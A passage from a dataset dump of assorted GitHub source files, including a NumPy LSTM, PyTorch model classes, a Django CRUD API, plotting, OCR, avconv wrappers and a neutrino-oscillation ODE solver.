None\n self.out_value = None\n self.c_minus_1 = None\n self.h_minus_1 = None\n self.x = None\n\n def forward(self, x, h_t_minus_1, c_minus_1):\n self.x = x\n self.c_minus_1 = c_minus_1\n self.h_minus_1 = h_t_minus_1\n self.A = np.dot(x, self.W_x) + np.dot(h_t_minus_1, self.W_h) + self.b\n forget_index = self.hidden_size\n new_information_index = 2 * self.hidden_size\n input_index = 3 * self.hidden_size\n self.forget_gate = self.forget_sigmoid.forward(self.A[:, :forget_index])\n self.new_info = self.new_info_tanh.forward(self.A[:, forget_index:new_information_index])\n self.info_gate = self.information_sigmoid.forward(self.new_info)\n self.output_gate = self.output_sigmoid.forward(self.A[:, input_index:])\n self.c_t = (self.forget_gate * c_minus_1 +\n self.new_info * self.info_gate)\n self.out_value = self.cell_tanh.forward(self.c_t)\n self.h_t = self.output_gate * self.out_value\n return self.h_t, self.c_t\n\n def backward(self, dhnext, dcnext):\n self.grads = []\n do = dhnext * self.out_value\n dcnext += self.output_gate * self.cell_tanh.backward(dhnext)\n dcprev = self.forget_gate * dcnext\n df = self.c_minus_1 * dcnext\n dg = self.info_gate * dcnext\n di = self.new_info * dcnext\n df *= self.forget_sigmoid.backward(1)\n dg *= self.new_info_tanh.backward(1)\n di *= self.information_sigmoid.backward(1)\n do *= self.output_sigmoid.backward(1)\n dA = np.hstack((df, dg, di, do))\n dWx = np.dot(self.x.T, dA)\n dWh = np.dot(self.h_minus_1.T, dA)\n db = dA.copy()\n self.grads = [dWx, dWh, db]\n dhprev = np.dot(dA, self.W_h.T)\n dx = np.dot(dA, self.W_x.T)\n \n return dcprev, dhprev, dx\n\nclass Time_LSTM:\n def __init__(self, Wh, Wx, b, sequence_length):\n self.lstm = []\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.h_t_list = []\n self.c_t_list = []\n for _ in range(sequence_length):\n self.lstm.append(LSTM(Wh, Wx, b))\n \n def forward(self, x, h_t_minus_1, c_minus_1):\n self.h_t_list = []\n self.c_t_list = []\n for index, x_t in enumerate(x):\n h_t_minus_1, c_t_minus_1 = self.lstm[index].forward(x_t, h_t_minus_1, c_minus_1)\n self.h_t_list.append(h_t_minus_1)\n self.c_t_list.append(c_t_minus_1)\n return self.h_t_list, self.c_t_list\n\n def backward(self, dhnext, dcnext):\n Wx, Wh, b = self.params\n dx_list = []\n dcnext_list = []\n dhnext_list = []\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n for reversed_rnn in reversed(self.lstm):\n dcnext, dhnext, dx = reversed_rnn.backward(dhnext, dcnext)\n self.grads[0] += reversed_rnn.grads[0]\n self.grads[1] += reversed_rnn.grads[1]\n self.grads[2] += reversed_rnn.grads[2]\n dx_list.append(dx)\n dcnext_list.append(dcnext)\n dhnext_list.append(dhnext)\n return dcnext_list, dhnext_list, dx_list \n \n##class SGD:\n## def __init__(self, lr = 0.01):\n## self.lr = lr\n##\n## def update(self, params, grads):\n## for i in range(len(params)):\n## params[i] -= self.lr * grads[i]\n\n##input_size = 3\n##hidden_size = 3\n##batch_size = 2\n##\n##W_h = np.random.randn(hidden_size, 4 * hidden_size)\n##W_x = np.random.randn(input_size, 4 * hidden_size)\n##b = np.random.randn(batch_size, 4 * hidden_size)\n##h_t_minus_1 = np.random.randn(2, 3)\n##c_t_minus_1 = np.random.randn(2, 3)\n \n##lstm = LSTM(W_h, W_x, b)\n##x = np.array([[1, 2, 3], [1, 2, 3]])\n##lstm.forward(x, h_t_minus_1, c_t_minus_1)\n##lstm.backward(h_t_minus_1, c_t_minus_1)\n\n\n##x = np.array([[[1, 2, 3], [1, 2, 3]]])\n##rnn = Time_LSTM(W_h, W_x, b, 1)\n##h, c = rnn.forward(x, h_t_minus_1, c_t_minus_1)\n##dcnext, dhnext, dx = rnn.backward(1, 0)\n##optimizer = SGD()\n##optimizer.update(rnn.params, rnn.grads)\n\n\n\n\n","repo_name":"chiayisu/NLP_and_ML_Algorithm","sub_path":"Deep_Learning/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"13764346455","text":"import torch\nimport torch.nn as nn\nimport torch.nn.utils.spectral_norm as spectral_norm\nimport torch.nn.functional as F\nfrom typing import Callable\nimport einops\n\n\nclass ThemeMapping(nn.Module):\n def __init__(self, in_dim=3, out_dim=64):\n super(ThemeMapping, self).__init__()\n self.increase_dimension = nn.Sequential(\n nn.Conv2d(in_dim, out_dim, kernel_size=1, stride=1, padding=0, bias=False),\n nn.InstanceNorm2d(out_dim, affine=True),\n nn.LeakyReLU(0.2, inplace=True),\n )\n self.fc1 = nn.Linear(192, out_dim*2)\n self.layernorm1 = nn.LayerNorm(out_dim*2)\n self.fc2 = nn.Linear(out_dim*2, out_dim)\n self.layernorm2 = nn.LayerNorm(out_dim)\n self.act = nn.LeakyReLU()\n\n def forward(self, color_theme): # color theme (B, 3, 1, 3)\n x = self.increase_dimension(color_theme) # color theme (B, 64, 1, 3)\n B, C, H, W = x.size() # color theme (B, 64, 1, 3)\n x = x.reshape(B, -1, C*H*W) # (B, 1, 192)\n x = self.fc1(x) # (B, 1, 128)\n x = self.layernorm1(x) # (B, 1, 128)\n x = self.act(x) # (B, 1, 128)\n x = self.fc2(x) # (B, 1, 64)\n x = self.layernorm2(x)\n return x\n\n\nclass Lambda(nn.Module):\n def __init__(self, func: Callable):\n self.func = func\n super().__init__()\n\n def forward(self, *args, **kwargs):\n return self.func(*args, **kwargs)\n\n\nclass NormConv2d(nn.Conv2d):\n def __init__(self, channels, kernel_size=2):\n super().__init__(1, channels, kernel_size,\n padding='same',\n padding_mode='replicate',\n bias=False)\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n B = input.shape[0]\n input = einops.rearrange(input, 'B C H W -> (B C) 1 H W')\n\n weight = self.weight - einops.reduce(self.weight, 'K 1 H W -> K 1 1 1', 'mean')\n output = self._conv_forward(input, weight, self.bias)\n output = einops.rearrange(output, '(B C) K H W -> B C K H W', B=B)\n\n output = torch.abs(output)\n output = einops.reduce(output, 'B C K H W -> B K H W', 'mean')\n\n return output\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, dim_in, dim_out, spec_norm=False, LR=0.01, stride=1, up=False):\n super(ConvBlock, self).__init__()\n\n self.up = up\n if self.up:\n self.up_smaple = nn.UpsamplingBilinear2d(scale_factor=2)\n else:\n self.up_smaple = None\n\n if spec_norm:\n self.main = nn.Sequential(\n spectral_norm(nn.Conv2d(dim_in, dim_out, kernel_size=3, stride=stride, padding=1, bias=False)),\n nn.InstanceNorm2d(dim_out, affine=True, track_running_stats=True),\n nn.LeakyReLU(LR, inplace=True),\n )\n\n else:\n self.main = nn.Sequential(\n nn.Conv2d(dim_in, dim_out, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.InstanceNorm2d(dim_out, affine=True, track_running_stats=True),\n nn.LeakyReLU(LR, inplace=True),\n )\n\n def forward(self, x1, x2=None):\n if self.up_smaple is not None:\n x1 = self.up_smaple(x1)\n # input is CHW\n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3]\n\n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return self.main(x)\n else:\n return self.main(x1)\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_channels=1, spec_norm=False, LR=0.2):\n super(Encoder, self).__init__()\n\n self.layer1 = ConvBlock(in_channels, 16, spec_norm, LR=LR) # 256\n self.layer2 = ConvBlock(16, 16, spec_norm, LR=LR) # 256\n self.layer3 = ConvBlock(16, 16, spec_norm, LR=LR) # 128\n self.layer4 = ConvBlock(16, 16, spec_norm, LR=LR) # 128\n self.layer5 = ConvBlock(16, 16, spec_norm, LR=LR) # 64\n self.layer6 = ConvBlock(16, 16, spec_norm, LR=LR) # 64\n self.layer7 = ConvBlock(16, 16, spec_norm, LR=LR) # 32\n self.layer8 = ConvBlock(16, 16, spec_norm, LR=LR) # 32\n self.layer9 = ConvBlock(16, 16, spec_norm, LR=LR) # 16\n self.layer10 = ConvBlock(16, 16, spec_norm, LR=LR) # 16\n self.last_conv = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1)\n\n def forward(self, x):\n feature_map1 = self.layer1(x)\n feature_map2 = self.layer2(feature_map1)\n feature_map3 = self.layer3(feature_map2)\n feature_map4 = self.layer4(feature_map3)\n feature_map5 = self.layer5(feature_map4)\n feature_map6 = self.layer6(feature_map5)\n feature_map7 = self.layer7(feature_map6)\n feature_map8 = self.layer8(feature_map7)\n feature_map9 = self.layer9(feature_map8)\n feature_map10 = self.layer10(feature_map9)\n output = feature_map10\n output = self.last_conv(output)\n\n return output\n\n\nclass ReferenceGenerator(nn.Module):\n def __init__(self, in_dim=3, color_num=3, mid_dim=144, style_dim=48):\n super(ReferenceGenerator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(in_dim*color_num, mid_dim),\n nn.LayerNorm(mid_dim),\n nn.LeakyReLU(),\n nn.Linear(mid_dim, mid_dim),\n nn.LayerNorm(mid_dim),\n nn.LeakyReLU(),\n nn.Linear(mid_dim, style_dim*2),\n nn.LayerNorm(style_dim*2),\n nn.LeakyReLU(),\n nn.Linear(style_dim*2, style_dim),\n nn.Tanh(),\n )\n\n def forward(self, color_theme): # color theme (B, 3, 1, 5)\n B, C, H, W = color_theme.size() # color theme (B, 3, 1, 5)\n x = color_theme.reshape(B, -1) # (B, -1)\n x = self.model(x) # (B, 48)\n return x\n\n # def forward_interpolation(self, color_theme): # color theme (B, 3, 1, 5)\n # B, C, H, W = color_theme[0].size() # color theme (B, 3, 1, 5)\n # x1 = color_theme[0].reshape(B, -1) # (B, -1)\n # x1 = self.model(x1) # (B, 48)\n #\n # x2 = color_theme[1].reshape(B, -1)\n # x2 = self.model(x2)\n #\n # x = x1 * 0.2 + x2 * 0.8\n # x = torch.clip(x, -1, 1)\n #\n # return x\n\n\n","repo_name":"sk-wu/FlexIcon","sub_path":"models/reference_generator_palette.py","file_name":"reference_generator_palette.py","file_ext":"py","file_size_in_byte":6735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37454404425","text":"# wygenerować obrazek PNM o rozmiarze 32x32\n# zawierający naprzemiennie dwa kolory (dowolne)\n\nSZER = 32\nWYS = 32\n\nf = open(\"zadanie02.pnm\", \"w\")\nf.write(f\"P3 {SZER} {WYS} 255\\n\")\n\nfor y in range(WYS):\n for x in range(SZER):\n if y % 2 == 0:\n f.write(\"255 128 0\\n\")\n else:\n f.write(\"10 250 10\\n\")\n","repo_name":"Strzelec85/Prace","sub_path":"pliki/zadanie02.py","file_name":"zadanie02.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37836166532","text":"from django.shortcuts import render\n\n#imports for api view \n#api view, rest-framework respose\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n#imports for serialization\nfrom rest_framework import serializers\n\n#importing model for serialiazation of data\nfrom .models import Supplies\n \n \n#creating serializer\nclass SuppliesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplies #model to serialize\n fields = '__all__' #fields in model t serialize\n\n\n# Create your views here.\n\n#overview of api url navigations\n@api_view(['GET']) #deorator allows only get call for this view\ndef api_nav(request):\n api_urls_overview = {\n 'create': '/api/add-supplies/',\n 'read': '/api/view-supplies/',\n 'update': '/api/update-supplies/<int:id>',\n 'delete': '/api/delete-supplies/<int:id>',\n }\n return Response(api_urls_overview)\n\n#add supplies to the api\n@api_view(['POST']) #Post api view decorator for adding supplies\ndef add_supplies(request):\n #request for user data\n entered_data = request.data\n \n #add user entered data to model\n serializer_obj = SuppliesSerializer(data=entered_data)\n \n #check if data is valid, if true save\n if serializer_obj.is_valid():\n serializer_obj.save()\n\n return Response(serializer_obj.data)\n\n#view supplies\n@api_view(['GET'])\ndef view_supplies(request):\n #creating View_supplies objects and pass it to SuppliesSerializer class\n view_supplies = Supplies.objects.all()\n serializer_obj = SuppliesSerializer(view_supplies, many=True)\n \n return Response(serializer_obj.data)\n\n@api_view(['POST'])\ndef update_supplies(request, pk):\n #get instance to be updates\n update_supplies = Supplies.objects.get(id=pk)\n #get value to be updated\n entered_data = request.data\n \n #override instance and data os suppliesserializer class\n serializer_obj = SuppliesSerializer(instance=update_supplies, data=entered_data)\n \n if serializer_obj.is_valid():\n serializer_obj.save()\n\n return Response(serializer_obj.data)\n \n \n@api_view(['DELETE'])\ndef delete_supplies(request, pk):\n del_supplies = Supplies.objects.get(id=pk)\n del_supplies.delete()\n \n return Response(\"Item deleted!\")","repo_name":"bharath4488/django-api","sub_path":"api_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20078456941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 15 20:16:39 2019\n\n@author: ankusmanish\n\"\"\"\n\n#Write a Python program to display the grid and draw line charts of the closing value of Alphabet Inc. between October 3, 2016 to October 7, 2016\n\n\"\"\"\nDate,Close\n03-10-16,772.559998\n04-10-16,776.429993\n05-10-16,776.469971\n06-10-16,776.859985\n07-10-16,775.080017\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndata = pd.read_clipboard(sep = ',')\nx = data['Date']\ny = data['Close']\nplt.plot(x,y)\nplt.xlabel('Date')\nplt.ylabel('Closing Value')\nplt.grid(linewidth=0.5,linestyle='dashdot',color='k')\nplt.title('closing value of Alphabet Inc')\nplt.tick_params(\n axis='x', # changes apply to the x-axis\n labelbottom=False)\nplt.show()","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week4/Matplotlib/Matplotlib/Program_14.py","file_name":"Program_14.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27018406852","text":"from src import nms_api, test_api\nfrom src.enum_types_constants import RouteTypes, PriorityTypes, StationModes\nfrom utilities.network_up.mf_hub_1stn_up import MfHub1StnUp\n\noptions_path = 'test_scenarios.form_confirmation.shaper'\nbackup_name = 'default_config.txt'\n\n\nclass ShaperConfirmationCase(MfHub1StnUp):\n \"\"\"\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.25'\n __execution_time__ = None # approximate case execution time in seconds\n mf_hub_uhp = None\n stn1_uhp = None\n\n @classmethod\n def set_up_class(cls):\n super().set_up_class()\n test_options = test_api.get_options(options_path)\n # Creating and applying shaper to VNO\n shp = nms_api.create('network:0', 'shaper', test_options.get('vno_stn_shaper'))\n nms_api.update('vno:0', {'stn_shaper': shp})\n # Creating a shaper to individually assign to station\n shp = nms_api.create('network:0', 'shaper', test_options.get('stn_shaper'))\n # Adding 8 dummy stations\n for i in range(1, 9):\n stn = nms_api.create('vno:0', 'station', {\n 'name': f'dummy{i}',\n 'serial': 10000 + i,\n 'enable': True,\n 'rx_controller': 'controller:0',\n 'mode': StationModes.STAR,\n })\n # Assigning individual stn_shaper to every even station\n if i % 2 == 0:\n nms_api.update(stn, {'stn_shaper': shp})\n\n def test_sample(self):\n pass","repo_name":"underdark456/test_system","sub_path":"test_scenarios/form_confirmation/shaper/case_shaper_confirmation.py","file_name":"case_shaper_confirmation.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29182909805","text":"import aiohttp\n\nasync def get_rank():\n num = 0\n while True:\n num += 1\n async with aiohttp.ClientSession() as cs:\n async with cs.get(f'https://api.koreanbots.dev/bots/get?page={num}') as r:\n response = await r.json()\n data = [x['name'] for x in response['data']]\n if \"미야\" in data:\n index = data.index('미야')\n result = 9 * (num - 1) + (index + 1)\n return result\n\n","repo_name":"fossabot/Miya","sub_path":"utils/koreanbots.py","file_name":"koreanbots.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33504504926","text":"\"\"\"Functions for controlling and inspecting avconv.\"\"\"\n\nfrom decimal import Decimal\nfrom subprocess import call, check_output\nimport sys\n\nfrom django.conf import settings\n\n\nif sys.platform == 'linux2':\n\n AVPROBE_PATH = getattr(settings, 'AVPROBE_PATH', '/usr/bin/avprobe')\n AVPROBE_ARGS = [\n '-loglevel', 'error',\n '-f', 'mp3',\n '-show_format',\n ]\n AVCONV_PATH = getattr(settings, 'AVCONV_PATH', '/usr/bin/avconv')\n AVCONV_ARGS = [\n '-f', 'mp3',\n '-i',\n ]\n\nelif sys.platform == 'darwin':\n\n AVPROBE_PATH = getattr(settings, 'AVPROBE_PATH', '/usr/local/bin/ffprobe')\n AVPROBE_ARGS = [\n '-loglevel', 'error',\n '-f', 'mp3',\n '-show_format',\n ]\n AVCONV_PATH = getattr(settings, 'AVCONV_PATH', '/usr/local/bin/ffmpeg')\n AVCONV_ARGS = [\n '-f', 'mp3',\n '-i',\n ]\n\n\nQUANTIZE_EXPONENT = Decimal('0.01')\n\n\ndef media_length(filename):\n \"\"\"\n Use avconv to determine the length of the media.\n\n :param filename: Filename of media to inspect.\n :return: Length, in seconds of the media.\n \"\"\"\n args = (\n [AVPROBE_PATH]\n + AVPROBE_ARGS\n + [filename]\n )\n output = check_output(args)\n for line in output.splitlines():\n if line.startswith('duration'):\n duration = line.strip().split('=')[1]\n duration = Decimal(duration).quantize(QUANTIZE_EXPONENT)\n return duration\n raise ValueError('Could not find duration for {filename}'.format(**locals()))\n\n\ndef convert(raw_file, processed_file, avconv_settings):\n \"\"\"\n Convert a raw file to a processed file using the given list of settings.\n :param raw_file: Full path of raw file to read.\n :param processed_file: Full path of processed file to write.\n :param avconv_settings: List of strings of command-line options.\n :return: Exit code of avconv.\n \"\"\"\n args = (\n [AVCONV_PATH]\n + AVCONV_ARGS\n + [raw_file]\n + list(avconv_settings)\n + [processed_file]\n )\n return call(args)\n","repo_name":"fanscribed/fanscribed","sub_path":"fanscribed/apps/media/avlib.py","file_name":"avlib.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"33"} +{"seq_id":"3691700113","text":"# Найти средний балл на потоке (по всей таблице оценок).\n\nimport sqlite3\n\n\ndef execute_query(sql: str) -> list:\n with sqlite3.connect(\"university.db\") as con:\n cur = con.cursor()\n cur.execute(sql)\n return cur.fetchall()\n\n\nsql = \"\"\"\nSELECT round(AVG(m.mark), 2) FROM marks AS m;\n\"\"\"\n\nif __name__ == \"__main__\":\n print(execute_query(sql))\n","repo_name":"vokur13/goit-python-web-hw6-ii","sub_path":"query_4.py","file_name":"query_4.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20018087530","text":"from PIL import Image, ImageOps\nimport pytesseract\nimport os\nfrom csv import DictWriter\n\nRAW_IMAGE_PATH = os.path.join(os.getcwd(), 'cropped')\nDATA_PATH = os.path.join(os.getcwd(), 'data', 'yikyak.csv')\nconfig = '--psm 6'\n\nf = open(DATA_PATH, 'w')\nfieldnames = [\"content\"]\noutfile = DictWriter(f, fieldnames=fieldnames)\noutfile.writeheader()\nfor img_name in os.listdir(RAW_IMAGE_PATH):\n img_path = os.path.join(RAW_IMAGE_PATH, img_name)\n image = ImageOps.invert(Image.open(img_path).convert(\"L\"))\n text = pytesseract.image_to_string(image, lang='eng')\n \n text = text.strip().replace(\"\\n\", \" \")\n outfile.writerow({\"content\": text})\n\nf.close()\n\n \n \n","repo_name":"syedtaz/gate-yak-nlp","sub_path":"ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"1208469838","text":"from django.shortcuts import render\nfrom .models import Building\nfrom django.http import JsonResponse\n\n\ndef getfloors(request):\n buil_id = request.GET.get('id_building','')\n floor = 0\n try:\n floor = Building.objects.filter(pk=buil_id).first().floors\n except:\n print('error')\n \n if floor:\n data=[(str(x),str(x))for x in range(1, floor + 1)] \n # data=[role_name for role_name in Building.objects.filter(pk=mapi).first()]\n return JsonResponse(data, safe=False)","repo_name":"akshaymishra5395/dependent","sub_path":"takelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"74692871133","text":"\"\"\"\n-----\nID : diffSolvers.py\nAuthor : Taygun Bulmus\nE-Mail : bulmust@gmail.com\n-----\n\"\"\"\nimport time\nimport datetime\nimport os as osCommand\nfrom shutil import rmtree\n#import numpy as np\nimport RHS as func\nimport odeintw as integralSolver\n\n#from .readFiles import technicalParameters_read\n# Various Scripts\n#import taygunsScripts as tScripts\n\n# ============================\n# Colors For Printing\nclass tLog:\n INFO = '\\033[94m'+'[INFO] '+'\\033[0m'\n OK = '\\033[92m'+'[OK] '+'\\033[0m'\n WARNING = '\\033[93m'+'[WARNING] '+'\\033[0m'\n ERROR = '\\033[91m'+'[ERROR] '+'\\033[0m'\n EXIT = '\\033[91m'+'[EXIT] diffSolvers.py'+'\\033[0m'\n# ============================\n\n# ============================\n# Scipy Differential Equation Solver: LSODA (odeintw)\ndef odeintwSolver(init, RESULTS_SIMULATION_DIR):\n \"\"\"\n Definitions\n -----------\n Ordinary differential equation with initial value problem\n solver using modified default numpy ivp solver odeint called\n [odeintw](https://github.com/WarrenWeckesser/odeintw).\n odeintw is the modification of odeint core\n but it considers complex value inputs. The solving method is\n LSODA, see ref: [1](https://computing.llnl.gov/casc/odepack/) and\n [2](https://doi.org/10.1137/0904010)\n \"\"\"\n # ============================\n # Start calculating time\n timeInitialClock = time.time()\n timeInitialDate = datetime.datetime.now()\n # ============================\n # Create data folder and change the path\n DATA_FOLDER= RESULTS_SIMULATION_DIR+ 'data/'\n if not osCommand.path.exists(DATA_FOLDER):\n osCommand.makedirs(DATA_FOLDER)\n print(tLog.OK+\"Data Folder Created.\")\n else:\n print(tLog.ERROR+\"Data Folder Already Exists. Check The Folder: \"+ DATA_FOLDER)\n print(tLog.EXIT)\n if init.technicalParametersDic['holdIntermediateData']:\n # Create intermediateData folder\n INTERMEDIATE_DATA_FOLDER= RESULTS_SIMULATION_DIR+ 'data/intermediateData/'\n if not osCommand.path.exists(INTERMEDIATE_DATA_FOLDER):\n osCommand.makedirs(INTERMEDIATE_DATA_FOLDER)\n print(tLog.OK+\"Intermediate Data Folder Created.\")\n else:\n print(tLog.ERROR\\\n +\"Intermediate Data Folder Already Exists. Check The Folder: \"\\\n + INTERMEDIATE_DATA_FOLDER)\n print(tLog.EXIT)\n # Change directory to data \n # Code saves intermediate data\n osCommand.chdir(DATA_FOLDER)\n # ============================\n # Copy initial parameters\n #copy_tree('../../../parameters/', '.')\n #np.savez('rhoInit_flav.npz', rhoInit_flav=init.rhoInit_flav)\n # ============================ \n \n # ============================\n # Solve E.o.M.\n # Starting time\n print(tLog.INFO+'Start solving E.o.M with odeintw. Current date and time :'\\\n , timeInitialDate.strftime(\"%Y-%m-%d %H:%M:%S\"))\n # Hold intermediate data\n if init.technicalParametersDic['holdIntermediateData']:\n if init.dim_rho_2totFlav_Bool:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000) \n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n if init.dim_rho_2totFlav_Bool:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho_noInterData\\\n , init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, 